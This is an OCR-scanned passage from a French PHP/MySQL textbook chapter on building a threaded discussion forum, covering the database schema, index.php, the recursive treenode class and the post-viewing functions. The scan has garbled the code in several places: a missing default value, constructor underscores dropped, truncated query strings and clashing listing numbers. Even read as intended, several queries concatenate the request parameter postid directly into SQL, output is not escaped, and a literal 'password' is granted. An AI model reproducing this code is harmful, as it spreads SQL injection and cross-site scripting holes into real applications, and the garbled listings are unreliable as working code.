Bibliotheque 


Fonctions gerant l'enregistrement et la lecture 
des articles. 


output fns.php 




Bibliotheque 


Fonctions de generation du code HTML. 


create database 


. sql 


SQL 


Code SQL de configuration de la base de 
donnees de cette application. 



Interessons-nous maintenant a 1' implementation de cette application. 



Conception de la base de donnees 

Nous devons enregistrer certains attributs pour chaque article du forum : le nom de la 
personne qui l'a cree, le titre de cet article, a quel moment il a ete envoye et son 
contenu. Nous aurons par consequent besoin d'une table contenant les articles. Nous 
devrons creer un identificateur unique pour chaque article, que nous appellerons 
postid. 

Chaque article doit etre accompagne d' informations permettant de le situer dans la 
hierarchie. Nous pourrions avoir les informations sur les enfants d'un article avec Parti- 
cle lui-meme mais, chaque article pouvant etre suivi de plusieurs reponses, cela pourrait 
entrahier certains problemes dans la construction de la base de donnees. Comme 
chaque article ne peut etre une reponse qu'a un seul autre article, il est plus simple 
d'enregistrer une reference vers 1' article parent, c'est-a-dire Particle dont il est la 
reponse. 

Cela nous permet d'identifier les donnees a enregistrer pour chaque article : 

■ postid, un identificateur unique pour chaque article ; 

■ parent, le postid de l'article parent ; 
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■ poster, l'auteur de cet article ; 

■ title, le titre de cet article ; 

■ posted, la date et l'heure de creation de l'article ; 

■ message, le contenu de l'article. 

Nous apporterons certaines optimisations a ces informations. 

Pour determiner si un article est suivi de une ou de plusieurs reponses, nous devons 
effectuer une requete pour savoir si d'autres articles possedent cet article comme 
parent. Nous aurons besoin de cette information pour chaque article liste. Moins nous 
aurons a effectuer de requetes, plus le code sera rapide : nous pouvons done accelerer 
ce processus en ajoutant un champ indiquant si un article possede une reponse ou non. 
Nous appellerons ce champ children et il s'agira d'une variable booleenne qui vaudra 
1 si le nceud possede un enfant et dans le cas contraire. 

Toutes les optimisations ont un prix. Dans notre cas, nous avons choisi d'enregistrer des 
informations redondantes : comme nous enregistrons ces informations de deux manie- 
res differentes, il faut faire attention a ce que les deux representations contiennent 
toujours les memes informations. Lorsque nous ajouterons un enfant, nous devrons 
mettre a jour le parent correspondant. En outre, si nous autorisons la suppression d'un 
enfant, il faudra mettre a jour le parent pour s' assurer que la base de donnees reste cone- 
rente. Dans ce projet, nous n'implementerons aucun mecanisme de suppression des 
articles, ce qui resout la moitie du probleme mais, si vous decidez de completer ce code, 
n'oubliez pas ce point. 

Nous allons apporter une autre optimisation en separant le contenu des articles des 
autres donnees et en les stockant dans une autre table. En effet, le contenu des articles 
doit etre enregistre dans une colonne du type text de MySQL, or lorsqu'une table 
contient ce type de colonne les requetes sont ralenties. Comme nous allons effectuer 
beaucoup de petites requetes pour construire la structure de notre arborescence, cette 
optimisation nous permet de gagner beaucoup de temps. En placant le contenu des 
messages dans une autre table, nous pourrons ne les recuperer que lorsqu'un utilisateur 
souhaite lire le contenu d'un message particulier. 

Avec MySQL, les recherches sur des enregistrements de taille fixe sont bien plus rapi- 
des que celles sur des enregistrements de taille variable. Si nous devons utiliser des 
donnees de taille variable, nous pouvons ameliorer les performances en creant des index 
sur les champs qui seront utilises pour effectuer les recherches dans la base de donnees. 
Pour certains projets, il serait plus interessant de conserver le champ de texte avec tout 
le reste et de creer des index sur toutes les colonnes servant aux recherches. Cependant, 
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la production des index prend egalement du temps et les donnees de notre forum ont de 
bonnes chances d'etre modifiees tres souvent, ce qui nous obligerait a regenerer en 
permanence ces index. 

Nous allons egalement ajouter un attribut area, au cas ou nous deciderions par la suite 
d'implementer plusieurs forums de discussion avec une seule application. Ici, nous 
n'implementerons pas cette caracteristique mais, en prevoyant cette extension, vous 
pourrez le faire plus facilement. 

Nous pouvons done deduire les instructions SQL permettant de creer la base de 
donnees de notre forum. Vous les trouverez dans le Listing 29.1. 

Listing 29.1 : create_database.sql — Les instructions SQL de creation de la base de donnees 
du forum 



create database discussion; 

use discussion; 

create table header 
( 

parent int not null, 
poster char(20) not null, 
title char(20) not null, 
children int default not null, 
area int default 1 not null, 
posted datetime not null, 

postid int unsigned not null auto_increment primary key 

); 

create table body 
( 

postid int unsigned not null primary key, 
message text 

); 

grant select, insert, update, delete 
on discussion.* 

to discussion@localhost identified by 'password'; 



Vous pouvez creer cette structure de base de donnees en fournissant ce script a MySQL, 
comme ceci : 

mysql -u root -p < create_database . sql 
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Vous devrez naturellement saisir votre mot de passe root et modifier le mot de passe 
que nous avons choisi dans ce script pour l'utilisateur discussion. 

Pour mieux comprendre 1' organisation des articles dans cette structure, ainsi que leurs 
relations entre eux, examinons la Figure 29.3. 



Representation dans 
la base de donnees 



Representation sous 
forme arborescente 



postid: 1 parent: 



postid: 2 parent: 1 



postid: 3 parent: 1 



postid: 4 parent: 2 




postid: 5 parent: 2 



Figure 29.3 

La base de donnees contient la structure de I'arborescence sous la forme d'une structure 
relationnelle mise a plat. 



Comme vous pouvez le constater, le champ parent de chaque article contient le postid 
de P article situe immediatement au-dessus dans I'arborescence. 

Vous pouvez egalement voir que le nceud racine, dont le postid vaut 1, n'a aucun 
parent. Tous les nouveaux sujets de discussion sont dans le meme cas. Pour les arti- 
cles de ce type, nous enregistrons zero comme parent dans la base de donnees. 



Afficher I'arborescence des articles 

Ensuite, nous devons pouvoir recuperer les informations dans la base de donnees et les 
presenter sous la forme d'une arborescence. Cette operation est effectuee par la page 
principale, index.php. A titre d'exemple, nous avons introduit certains articles grace 
aux scripts de creation d' articles new _post.php et store _new _post.php. Nous reviendrons 
sur ces scripts dans la section suivante. 

Nous commencerons par la liste des articles, puisqu'il s'agit du cceur de cette application. 
Apres cela, tout le reste devrait etre un peu plus simple. 
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La Figure 29.4 presente l'etat initial de la page d'affichage des articles. Cette figure 
presente tous les articles d'origine. Aucun d'entre eux n'est une reponse ; chacun 
correspond au premier article d'un sujet particulier. 



File Edit View History Bookmarks Tools Help 



http:..-/localho:t/phpmy-:ql4e/chapter31/inde):.prip 



^flfj^fr Discussion Posts 


New Post 


Expand 


Collapse j 



ffl PHP setup - ? - Fred - 09:05 07/20/2008 
^ persistence - archer - 09:D7 07/20/2008 
new article - Mary - 09:08 07/20/2008 
cqi vs module? - big coder - 09:08 07/20/2008 
using qd - newbie - 09:08 07/20/2008 




Figure 29.4 

L'affichage initial de la liste des articles presente ceux-ci sous une forme "compacte " 



Vous pouvez constater que nous disposons d'un certain nombre d'options. Le haut de la 
page comprend une barre de menus permettant d'aj outer un nouvel article et de deve- 
lopper ou de refermer les fils de discussion. 

Pour mieux comprendre cette page, examinons les articles presentes. Certains d'entre 
eux sont accompagnes du symbole "+", qui signifie qu'ils sont suivis de une ou de 
plusieurs reponses. Pour af richer les reponses d'un article particulier, il suffit de cliquer 
sur ce symbole. La Figure 29.5 presente le nouvel affichage des articles apres avoir 
clique sur le "+" d'un des sujets. 

Comme vous pouvez le constater, cette operation permet d'afficher les reponses au 
premier article. Le symbole "+" s'est transforme en un symbole " ". Si nous cliquons 
sur celui-ci, tous les articles de ce fil seront regroupes, ce qui nous ramene a l'affichage 
initial. 



748 Partie V 



Creer des projets avec PHP et MySQL 



^ Prussian Posts - MoTiiT^S 



File Edit View History Bookmarks Tools Help 



x— " T i. , ft 1 http://localhoEt/phpmyEql4e..'chapter31/index,php?expand=2^2 



LE 



^flfllfr Discussion Posts 



New Post Expand Collapse 



S PHP setup? - Fred - D9:05 07/20/2008 
H persistence - archer - 09:07 07/20/2008 

H Re: persistence - Laura - 09:08 07/20/2008 
Re: persistence - Luke - 09:09 07/20/2008 
Re: persistence - Barry - 09:09 07/20/2008 
new article - Mary - 09:08 07/20/2008 
cqi vs module? - big coder - 09:0B 07/20/2008 
using qd - newbie - 09:08 07/20/2008 




Figure 29.5 

Le fil de discussion sur la persistance a ete developpe. 



Vous remarquerez egalement que l'une des reponses est accompagnee d'un symbole 
"+", ce qui signifie qu'elle possede elle-meme d'autres reponses. Ce mecanisme peut 
continuer indefiniment et vous pouvez afficher chaque ensemble de reponses en 
cliquant sur le symbole "+" approprie. 

Les deux options de la barre de menus, Expand et Collapse, permettent respectivement 
d'extraire tous les fils de discussion possibles et de les regrouper. La Figure 29.6 
presente le resultat obtenu apres avoir clique sur le bouton Expand. 

Si vous examinez avec attention les Figures 29.5 et 29.6, vous constaterez que nous 
transmettons certains parametres d'entree a index.php. Ainsi, dans la Figure 29.5, 
l'URL est la suivante : 

http: / /localhost/phpmysql4e/chapitre29/ index . php?expand=2#2 

Le script interprete cette URL comme "Ouvrir Particle dont le code postid vaut 2". Le 
signe # est simplement un signet HTML permettant de derouler la page HTML jusqu'a 
la partie qui vient d'etre developpee. 

Voici l'URL de la Figure 29.6 : 

http: / /localhost/phpmysql4e/chapitre29/ index . php?expand=all 
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Discussion Posts - Mozilla 



File Edit View History BockmErlcs Tools Help 



v - ■ | http://localhQst/phprnysql4e/chapter31/tnd!Bc.php?EMpand=all 



Discussion Posts 



New Post; Expand Collapse 



B PHP setup? - Fred - 09:05 07/20/200B 

B Re: PHP setup? - Julie - 09:09 07/20/2008 

Re: PHP setup?- Jane- 09:18 07/20/2008 
Re: PHP setup? - Luke - 09:1 8 07/20/2008 
B persistence - archer - 09:07 07/20/2008 

B Re: persistence - Laura - 09:08 07/20/2008 
Re: persistence - Luke - 09:09 07/20/2008 
Re: persistence - Barry - 09:09 07/20/2008 
new article - Mary - 09:08 07/20/2008 
cqi vs module? - big coder - 09:0B 07/20/2008 
using gd - newbie - 09:08 07/20/2008 




Figure 29.6 

Tous les fils de discussion ont ete ouverts. 



Lorsque l'utilisateur a clique sur le bouton Expand, le parametre expand a ete passe 
avec la valeur all. 



Ouverture et fermeture des fils de discussion 

Voyons maintenant comment fonctionnent ces deux operations en examinant le script 
index.php, qui est presente dans le Listing 29.2. 

Listing 29.2 : index.php — Ce script cree la liste des articles dans la page principale de 
('application 



<?php 

include ( 'include_fns.php' ) ; 
session_start() ; 



// Teste si la variable de session a ete creee. 
if ( !isset($_SESSI0N[ 'expanded' ] ) ) { 
$_SESSI0N[ ' expanded ' ] = array(); 

} 

// Teste si le bouton Expand a ete presse. 

// expand peut valoir 'all', un postid ou ne pas etre defini. 
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if (isset($_GET[ 1 expand 1 ]) ) { 
if ($_GET[ 'expand' ] == 'all') { 

expand_all($_SESSION[ 'expanded' ]) ; 
} else { 

$_SESSI0N[ ' expanded '] [$_GET[ ' expand '] ] = true; 

} 

} 

// Teste si le bouton Collapse a ete presse. 

// collapse peut valoir 'all', un postid ou ne pas etre defini. 

if (isset($_GET[ ' collapse ']) ) { 

if ($_GET[ 'collapse' ]=='all' ) { 
$_SESSION[ ' expanded ' ] = array(); 

} else { 

unset ($_SESSION[ 'expanded ' ] [$_GET[ ' collapse' ] ] ) ; 

} 

} 

do_html_header( ' Discussion Posts ' ) ; 
display_index_toolbar( ) ; 

// Affiche la vue arborescente des conversations. 
display_tree($_SESSION[ 'expanded ' ] ) ; 

do_html_f ooter( ) ; 

?> 



Ce script utilise trois variables : 

La variable de session expanded conserve la trace des fils de discussion qui ont ete 
ouverts. Cette variable peut etre preservee d'un affichage a 1' autre arm de pouvoir 
avoir plusieurs fils de discussion ouverts. C'est un tableau associatif contenant les 
postid des articles dont les reponses sont affichees. 

■ Le parametre expand indique au script les nouveaux fils de discussion a developper. 

■ Le parametre collapse indique au script les fils de discussion a refermer. 

Lorsque l'utilisateur clique sur le symbole "+" ou le symbole " ", ou sur les boutons 
Expand ou Collapse, index.php est rappele avec les nouvelles valeurs des parametres 
expand et collapse. Nous nous servons de expanded dans chaque page pour conserver 
une trace des fils a developper dans une vue donnee. 

Le script commence par ouvrir une session et y ajoute la variable expanded comme 
variable de session, si elle n'est pas encore presente. 

Puis il verifie qu'il lui a ete passe un parametre expand ou collapse et modifie le 
tableau expanded en consequence. Voici le code du parametre expand : 

if (isset($_GET[ 'expand' ]) ) { 

if ($_GET[ 'expand' ] == 'all') { 
expand_all($_SESSION[ ' expanded' ] ) ; 
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} else { 

$_SESSION[ ' expanded '] [$_GET[ ' expand '] ] = true; 

} 

} 

Si l'utilisateur a clique sur le bouton Expand, on appelle la fonction expand all ( ) pour 
ajouter dans le tableau expanded tous les fils de discussion qui possedent des reponses. 
Nous y reviendrons dans un moment. 

Si l'utilisateur tente de developper un fil de discussion particulier, le script recoit son 
postid via expand. Pour rendre compte de cette action, il suffit d'ajouter une nouvelle 
entree dans le tableau expanded. 

La fonction expand all ( ) est presentee dans le Listing 29.3. 

Listing 29.3 : La fonction expand_all() de discussion_fns.php — Cette fonction traite le 
tableau expanded pour ouvrir tous les fils du forum 



function expand_all(&$expanded) { 

// Marque tous les fils de discussion ayant des enfants 
// comme devant etre developpes. 
$conn = db_connect ( ) ; 

$query = "select postid from header where children = 1"; 
$result = $conn->query ($query) ; 
$num = $result->num_rows ; 
for($i = 0; $i<$num; $i++) { 

$this_row = $result->f etch_row( ) ; 

$expanded[$this_row[0] ]=true; 

} 

} 



Cette fonction execute une requete sur la base de donnees afin de determiner les fils de 
discussion qui possedent des reponses : 

select postid from header where children = 1 

Chacun des articles renvoyes est ensuite ajoute dans le tableau expanded. Cette requete 
permet d'economiser du temps par la suite. Nous pourrions nous contenter d'ajouter 
tous les articles a la liste "developpee", mais le traitement des reponses qui n'existent 
pas serait une perte de temps. 

La fermeture des fils de discussion fonctionne de la meme maniere, mais dans 1' autre 
sens : 

if(isset($_GET['collapse'])) { 

if ($_GET[ 'collapse' ]=='all l ) { 

$_SESSI0N[ ' expanded ' ] = array(); 
} else { 

unset ($_SESSION[ 'expanded ' ] [$_GET[ ' collapse' ] ] ) ; 

} 

} 
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On peut supprimer des articles du tableau expanded grace a unset. Nous supprimons le 
fil de discussion qui doit etre referme ou nous supprimons l'integralite du tableau avec 
unset si toute la page doit etre refermee. 

Toutes ces operations font partie du pretraitement, afin de determiner les articles qui 
doivent etre affiches et ceux qui ne doivent pas l'etre. La partie cruciale de ce script est 
l'appel a : 

display_tree($_SESSION[ 1 expanded 1 ] ) ; 
qui produit l'arborescence des articles affiches. 

Affichage des articles 

Etudions la fonction display t ree ( ) , dont le code se trouve dans le Listing 29.4. 

Listing 29.4 : La fonction display_tree() de outputjns.php — Cette fonction cree le 
nceud racine de l'arborescence 



function display_tree($expanded, $row = 0, $start = 0) { 
// Affiche l'arborescence des discussions. 

global $table_width; 

echo "<table width=\ " " .$table_width . " \ ">" ; 

// Affiche-t-on la liste entiere ou une sous-liste ? 
if($start>0) { 

$sublist = true; 
} else { 

$sublist = false; 

} 

// Construit la structure de l'arborescence representant le 
// resume des discussions 

$tree = new treenode($start, '', '', 11 , 1, true, -1, $expanded, 
$sublist) ; 

// Demande a l'arbre de s'afficher. 
$tree->display ($row, $sublist); 

echo "</table>"; 

} 



Le role principal de cette fonction est de creer le nceud racine de l'arborescence. Nous 
nous en servons pour afficher 1' index complet et pour creer les branches de l'arbre 
correspondant aux reponses dans la page view _post.php. Comme vous pouvez le constater, 
cette fonction attend trois parametres. $expanded correspond a la liste des postid des 
articles a afficher et $row est un indicateur de numero de ligne qui servira a mettre en 
place l'alternance des couleurs dans les lignes a afficher. 
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Le troisieme parametre, $start, indique a la fonction ou commencer a afficher les arti- 
cles. II s'agit du postid du noeud racine de l'arborescence qui doit etre creee et affichee. 
Si nous affichons toute l'arborescence, comme sur la page principale, ce parametre vaut 
0, ce qui signifie qu'il faut afficher tous les articles ne possedant aucun parent. Si ce 
parametre vaut 0, on initialise $sublist a la valeur false et on affiche l'integralite de 
l'arborescence. 

Si ce parametre est superieur a zero, on l'utilise comme noeud racine de l'arborescence 
a afficher, on initialise $sublist a true et on n'affiche qu'une partie de l'arborescence. 
Nous nous servirons de cette technique dans le script view _post.php. 

La tache la plus importante de cette fonction est la creation d'une instance de la classe 
treenode pour representer la racine de l'arborescence. II ne s'agit pas reellement d'un 
article, mais elle sert de parent pour tous les articles du premier niveau qui ne possedent 
aucun parent. Apres avoir construit l'arborescence, nous nous contentons d'appeler sa 
fonction display ( ) pour afficher la liste des articles. 

Utilisation de la classe treenode 

Le code de la classe treenode est presente dans le Listing 29.5. Si vous avez besoin 
d'un petit rappel sur le fonctionnement des classes, n'hesitez pas a consulter le Chapi- 
tre 6. 

Listing 29.5 : La classe treenode de treenodejclass.php — Le cceur de I'application 



<?php 

// Fonctions permettant de charger, de construire et d' afficher 
// l'arborescence. 
class treenode { 

// Chaque noeud de l'arbre possede des variables membres 

// contenant toutes les donnees d'un article, sauf son contenu. 

public $m_postid; 

public $m_title; 

public $m_poster; 

public $m_posted; 

public $m_children; 

public $m_childlist ; 

public $m_depth; 

public function construct ($postid , $title, $poster, $posted, 

$children, $expand, $depth, $expanded, $sublist) { 
// Le constructeur definit les variables membres, mais surtout 
// cree recursivement les parties inferieures de l'arbre. 
$this->m_postid = $postid; 
$this->m_title = $title; 
$this->m_poster = $poster; 
$this->m_posted = $posted; 
$this->m_children =$children; 
$this->m_childlist = array(); 
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$this->m_depth = $depth; 

// Les noeuds situes sous ce noeud ne nous interessent que si 
// ce noeud possede des enfants et s'il doit etre ouvert. 
// Les sous-listes doivent toujours etre ouvertes. 
if(($sublist || $expand) && $children) { 
$conn = db_connect( ) ; 

$query = "select * from header where 

parent = ' " .$postid . " ' order by posted"; 
$result = $conn->query ($query) ; 

for ($count=0; $row = @$result->f etch_assoc ( ) ; $count++) { 
if($sublist || $expanded[$row[ ' postid ' ] ] == true) { 

$expand = true; 
} else { 

$expand = false; 

} 

$this->m_childlist[$count]= new treenode ($row[ 1 postid '] , 
$row[ 'title ' ] , $row[ 1 poster 1 ] ,$row[ 1 posted ' ] , 
$row[ ' children 1 ] , $expand, $depth+1 , $expanded, 
$sublist) ; 

} 

} 

} 



function display ($row, $sublist = false) { 

// Comme il s'agit d'un objet, il est responsable de son 

// affichage. $row indique a quelle ligne de l'affichage nous 

// en sommes, afin de l'afficher avec la bonne couleur. 

// $sublist indique si nous nous trouvons sur la page 

// principale ou sur la page d'un article. Les pages des 

// articles doivent etre definies avec $sublist = true. 

// Dans une sous-liste, tous les messages sont developpes et 

// il n'y a aucun symbole "+" ou 

// S'il s'agit du noeud racine vide, on saute l'affichage. 
if ($this->m_depth>-1 ) { 

// Couleurs alternees pour les lignes. 
echo "<tr><td bgcolor=\""; 
if ($row%2) { 

echo "#cccccc\ ">" ; 
} else { 

echo "#ffffff\">" ; 

} 

// Indente les reponses en fonction de leur niveau. 
for($i = 0; $i < $this->m_depth; $i++) { 

echo "<img src=\ "images/spacer. gif\ " height=\ "22\ " 

width=\"22\" alt=\"\" valign=\ "bottom\ " />"; 

} 

// Affiche "+" ou "-" ou un espace. 
if ((!$sublist) && ($this->m_children) && 
(sizeof ($this->m_childlist) ) ) { 
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// Nous sommes sur la page principale, le noeud possede 
// des enfants et ils sont developpes. 

// Le noeud est ouvert. Afficher un bouton pour le fermer. 

echo "<a href=\"index.php?collapse=" . 

$this->m_postid. "#" . $this->m_postid . "\"><img 
src=\ "images /minus. gif\ " valign=\ "bottom \ " 
height=\"22\" width=\"22\" alt=\ "Collapse ThreadV 
border=\"0\" /></a>\n"; 
} else if(!$sublist && $this->m_children) { 

// Le noeud est ferme. Afficher un bouton pour l'ouvrir. 

echo "<a href=\"index.php?expand=" . 

$this->m_postid. "#" . $this->m_postid . "\"><img 
src=\ "images /plus . gif \ " valign=\ " bottom \ " 
height=\"22\" width=\"22\" alt=\"Expand Thread\" 
border=\"0\" /></a>\n"; 
} else { 

// II n'y a aucun enfant, ou nous sommes dans une 

// sous-liste. N'afficher aucun bouton. 

echo "<img src=\ "images/spacer. gif \ " height=\ "22\ " 

width=\"22\" alt=\"\" valign=\"bottom\ l 7>\n"; 



echo "<a name=\ " " .$this->m_postid. " \ "><a href= 

\ "view_post . php?postid=" .$this->m_postid. "\">" . 

$this->m_title. " - " .$this->m_poster. " - ". 

ref ormat_date($this->m_posted) . "</a></td></tr>" ; 

// Incrementer le compteur de ligne pour alterner les 

// couleurs 

$row++; 

} 

// Appeler l'affichage de chaque enfant du noeud. 
// Un noeud referme n'a aucun enfant. 
$num_children = sizeof ($this->m_childlist) ; 
for($i = 0; $i<$num_children; $i++) { 

$row = $this->m_childlist[$i]->display($row, $sublist); 

} 

return $row; 

} 

} 



Une instance de la classe treenode contient tous les details concernant un article parti- 
culier et les liens vers toutes les reponses de cette classe. Cela nous donne done les 
variables membres suivantes : 

public $m_postid; 

public $m_title; 

public $m_poster; 

public $m_posted; 

public $m_children; 

public $m_childlist ; 

public $m_depth; 
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Vous remarquerez que la classe treenode ne contient pas le contenu d'un article car il 
est inutile de le charger tant que l'utilisateur n'invoque pas le script view _post.php. 
Cette operation doit etre acceleree autant que possible, puisque nous effectuons beau- 
coup de manipulations pour af richer l'arborescence, pour rafraichir la page ou lorsque 
l'utilisateur clique sur un bouton. 

Ces variables respectent la convention de noms utilisee couramment dans les applica- 
tions orientees objet, puisqu'elles commencent par m pour nous rappeler qu'il s'agit de 
variables membres d'une classe. 

La plupart de ces variables correspondent directement aux lignes de la table header de 
notre base de donnees, a l'exception de $m childlist et de $m depth. Nous nous 
servons de la variable $m childlist pour enregistrer les reponses a l'article courant. La 
variable $m depth contient un indice correspondant au niveau d'arborescence auquel 
nous sommes actuellement. Cette variable sera utilisee lors de l'affichage de la page. 

Le constructeur definit la valeur de toutes les variables : 

public function construct ($postid , $title, $poster, $posted, 

$children, $expand, $depth, $expanded, $sublist) { 
// Le constructeur definit les variables membres, mais surtout 
// cree recursivement les parties inferieures de l'arbre. 
$this->m_postid = $postid; 
$this->m_title = $title; 
$this->m_poster = $poster; 
$this->m_posted = $posted; 
$this->m_children =$children; 
$this->m_childlist = array(); 
$this->m depth $depth; 

Lorsque nous construisons la classe racine treenode avec la fonction display tree( ) 
dans la page principale, nous creons en fait un nceud virtuel auquel aucun article n'est 
associe. Nous lui passons quelques valeurs initiales : 

$tree = new treenode($start, '', '', '', 1, true, -1, $expanded, 
$sublist) ; 

Cette ligne cree un nceud racine dont le $postid vaut et qui peut etre utilise pour iden- 
tifier tous les articles du premier niveau, puisque leur parent vaut 0. Nous choisissons 
1 comme profondeur, puisque ce noeud ne fait pas reellement partie de l'affichage. Tous 
les articles de premier niveau auront une profondeur de et seront affiches tout a 
gauche de l'ecran. Les niveaux suivants seront affiches vers la droite de l'ecran. 

Le traitement le plus important de ce constructeur consiste a instancier les nceuds 
enfants de ce nceud. Nous commencons ce processus en verifiant si nous avons besoin 
de developper les nceuds enfants et nous n'effectuons cette operation que si un nceud 
possede des enfants et si nous avons choisi de les afficher : 

if(($sublist || $expand) && $children) { 
$conn = db_connect( ) ; 
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Nous nous connectons ensuite a la base de donnees et nous recuperons tous les articles 
enfants : 

$query = "select * from header 

where parent = ' " .$postid . " ' order by posted"; 
$result = $conn->query ($query) ; 

Nous remplissons ensuite le tableau $m childlist avec les instances de la classe tree 
node, contenant les reponses a l'article enregistre dans ce treenode : 

for ($count=0; $row = @$result->f etch_assoc ( ) ; $count++) { 
if($sublist || $expanded[$row[ 1 postid ' ] ] == true) { 

$expand = true; 
} else { 

$expand = false; 

} 

$this->m_childlist[$count]= new treenode ($row[ ' postid '] , 

$row[ 'title ' ] , $row[ ' poster' ] ,$row[ 1 posted ' ] , 
$row[ ' children 1 ] , $expand, $depth+1 , $expanded, 
$sublist) ; 

} 

La derniere ligne cree les nouveaux treenode, en respectant exactement le meme 
processus, mais pour le niveau suivant de l'arborescence. II s'agit d'un appel recursif : 
un nceud parent appelle le constructeur treenode, lui passe son propre postid comme 
parent et ajoute 1 au niveau de profondeur avant de le lui passer en parametre. 

Chaque treenode est cree et cree a son tour ses propres enfants, jusqu'a ce que nous 
n'ayons plus de reponse a afficher, ou jusqu'a ce que nous ayons atteint le niveau choisi. 

Apres cela, nous appelons la fonction d'affichage du treenode racine (de retour dans 
display tree ()), comme ceci : 

$tree->display ($row, $sublist); 

La fonction display ( ) commence par verifier s'il s'agit du nceud racine virtuel : 

if ($this->m_depth>-1 ) 

II peut etre identifie de cette maniere, pour eviter de 1' afficher. Cependant, nous ne 
souhaitons pas l'ignorer completement : nous ne voulons pas qu'il apparaisse, mais il 
doit avertir ses enfants qu'ils doivent s' afficher. 

La fonction commence alors a dessiner le tableau contenant les articles. Elle se sert de 
l'operateur modulo (%) pour choisir la couleur de fond de chaque ligne, ce qui produit 
done une alternance de couleur : 

// Couleurs alternees pour les lignes. 
echo "<tr><td bgcolor=\""; 
if ($row%2) { 

echo "#cccccc\ ">" ; 
} else { 

echo "#ffffff \">" ; 

} 
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Elle se sert ensuite de la variable membre $m depth pour determiner l'indentation de 
l'article actuel. Si vous examinez les figures, vous remarquerez que l'indentation 
correspond directement au niveau de profondeur d'un article. Pour cela, nous nous 
servons du code suivant : 

// Indente les reponses en fonction de leur niveau. 
for($i = 0; $i < $this->m_depth ; $i++) { 

echo "<img src=\ "images/spacer . gif\ " height=\ "22\ " 

width=\ "22\ " alt=\"\" valign=\ "bottom\ " />"; 

} 

La partie suivante de la fonction permet de determiner si nous devons afficher un signe 
"+", un signe " ", ou rien du tout. 

// Affiche "+" ou "-" ou un espace. 
if ((!$sublist) && ($this->m_children) && 
sizeof ($this->m_childlist) ) ) { 

// Nous sommes sur la page principale, le noeud possede 

// des enfants et ils sont developpes. 

1 1 Le noeud est ouvert. Afficher un bouton pour le fermer. 
echo "<a href=\ "index. php?collapse=" . 

$this->m_postid . "#" . $this->m_postid . " \ "><img 

src=\ "images /minus. gif \ " valign=\ "bottom \ " 

height=\"22\" width=\"22\" alt=\ "Collapse Thread\" 

border=\"0\" /></a>\n"; 
} else if(!$sublist && $this->m_children) { 

// Le noeud est ferme. Afficher un bouton pour l'ouvrir. 
echo "<a href=\ "index. php?expand=" . 

$this->m_postid . "#" . $this->m_postid . " \ "><img 

src=\ "images /plus . gif \ " valign=\ " bottom \ " 

height=\"22\" width=\"22\" alt=\"Expand Thread\" 

border=\"0\" /></a>\n"; 

} else { 

// II n'y a aucun enfant, ou nous sommes dans une 

// sous-liste. N'afficher aucun bouton. 

echo "<img src=\ "images/spacer . gif \ " height=\ "22\ " 

width=\"22\" alt=\"\" valign=\"bottom\"/>\n"; 

} 

Ensuite, nous affichons les donnees relatives a ce noeud : 

echo "<a name=\ " " .$this->m_postid . " \ "><a href= 

\ "view_post . php?postid=" .$this->m_postid. "\">" . 

$this->m_title. " - " .$this->m_poster. " - ". 

ref ormat_date($this->m_posted) . "</a></td></tr>" ; 

Nous modifions la couleur pour la ligne suivante : 

// Incrementer le compteur de ligne pour alterner les 

// couleurs 

$row++; 

Vient ensuite un code qui sera execute par tous les treenode, y compris celui de la 
racine : 
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// Appeler l'affichage de chaque enfant du noeud. 
// Un noeud referme n'a aucun enfant. 
$num_children = sizeof ($this->m_childlist) ; 
for($i = 0; $i<$num_children; $i++) { 

$row = $this->m_childlist[$i]->display($row, $sublist); 

} 

return $row; 

II s'agit egalement d'un appel recursif qui appelle tous les enfants du noeud actuel pour 
qu'ils s'affichent eux-memes. Nous leur passons la couleur de ligne actuelle et nous 
leur demandons de la renvoyer lorsqu'ils ont fini afin que nous puissions alterner les 
couleurs. 

Nous avons maintenant termine 1' etude de cette classe. Son code etant assez complexe, 
il peut etre interessant de faire quelques experiences en executant 1' application et d'y 
revenir lorsque vous serez un peu plus familiarise avec elle. 



Afficher des articles particuliers 

L' appel de la fonction display tree() a pour resultat d'afficher une serie de liens 
pointant vers des articles. Si l'utilisateur clique sur l'un de ces articles, il est renvoye au 
script view _post.php, avec un parametre correspondant au postid de l'article a afficher. 
Le resultat obtenu est celui de la Figure 29.7. 



% Per -i-- er , ce . Mo-' a Firefox^H" 

File Edit View History Bnnkmarks Tonls Help 

_ - hHp:.'/loLdlhost.' , phpniv:ql4e.-'chapter31-''.'ieiv_poit.php:portid-2 T U 



^MWb persistence 


From: archer 

Pasted: 2008-07-20 09:07:30 


New Post 


Reply 


Index J 



How do I make a variable carry over from page to page? 
Archer 




Dane 



Figure 29.7 

Nous pouvons maintenant afficher le contenu du message correspondant a /'article specif ie. 
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Ce script, dont le code est presente dans le Listing 29.6, affiche le contenu du message 
ainsi que ses reponses. Vous constaterez que celles-ci sont une fois de plus affichees 
sous la forme d'une arborescence, mais cette fois entierement ouverte et sans les 
boutons "+" et " ". Ce comportement est obtenu grace a $sublist. 

Listing 29.6 : view _post.php — Affichage du contenu d'un message 



<?php 

// Inclusion des bibliotheques de fonctions. 

include ( ' include_f ns . php 1 ) ; 

$postid = $_GET[ 'postid' ] ; 

// Recuperation des details d'un article 

$post = get_post($postid) ; 

do_html_header($post[ 'title' ] ) ; 

// Affichage de l'article. 
display_post($post) ; 

// Si l'article a des reponses, on affiche leur arborescence. 
if ($post[ 'children' ]) { 

echo "<br /><br />" ; 

display_replies_line( ) ; 

display_tree($_SESSION[ ' expanded '] , 0, $postid); 

} 

do_html_f ooter( ) ; 

?> 



Ce script se sert essentiellement de trois appels de fonctions: get post(), 
display post () et display tree(). 

La fonction get post() extrait les donnees relatives a un article dans la base de 
donnees. Son code est presente dans le Listing 31.7. 

Listing 31.7 : La fonction get _post() de discussion jfns.php — Cette fonction recupere 
un message dans la base de donnees 



function get_post ($postid ) { 

// Extrait un article de la base de donnees et le renvoie 
// dans un tableau. 

if(!$postid) { 
return false; 

} 
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$conn = db_connect() ; 

// Recuperation de toutes les informations d'en-tete 
// a partir de la table 'header' 

$query = "select * from header where postid = '".$postid. 
$result = $conn->query ($query) ; 
if ($result->num_rows ! =1 ) { 
return false; 

} 

$post = $result->fetch_assoc( ) ; 

// Recuperation du contenu de l'article et ajout au resultat 
// precedent. 

$query = "select * from body where postid = '".$postid. ; 
$result2 = $conn->query ($query) ; 
if ($result2->num_rows>0) { 

$body = $result2->fetch_assoc( ) ; 

if($body) { 
$post[ 'message' ] = $body[ 'message' ] ; 

} 

} 

return $post; 

} 



A partir d'un postid, cette fonction effectue les deux requetes necessaries pour recupe- 
